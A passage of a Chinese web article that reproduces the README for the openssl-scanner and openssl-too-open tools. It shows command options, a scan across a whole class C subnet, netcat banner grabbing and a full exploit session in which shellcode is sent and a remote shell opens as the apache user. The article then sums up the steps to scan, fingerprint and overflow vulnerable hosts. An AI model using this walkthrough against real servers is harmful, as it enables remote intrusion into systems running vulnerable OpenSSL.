锐客网

  1. 首页 > 睿知 > >

openssl漏洞是apache还是php openssl漏洞( 二 )

经验知识睿知


-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
./openssl-scanner -C 192.168.0.0

/****扫描一个c类的ip
*****./openssl-scanner -C 192.168.0.0
****/

4.一个实现例子:

$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <solareclipse@phreedom.org>

Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable

$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html

./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>

: Opening 30 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$

整个README 文件已经说的很明白了:
现在是总结一下实现的过程:
1.通过openssl-scanner来扫描一个c段的ip , 找到有漏洞的主机 , 
2.用nc的 *** 查找banner得到三个目标内容:apache的版本号 , openssl的版本号 , 操作系统版本3.在通过openssl-too-open来进行溢出得到一个shell.

推荐阅读


上一篇:好看的网游小说

下一篇:风油精的作用是什么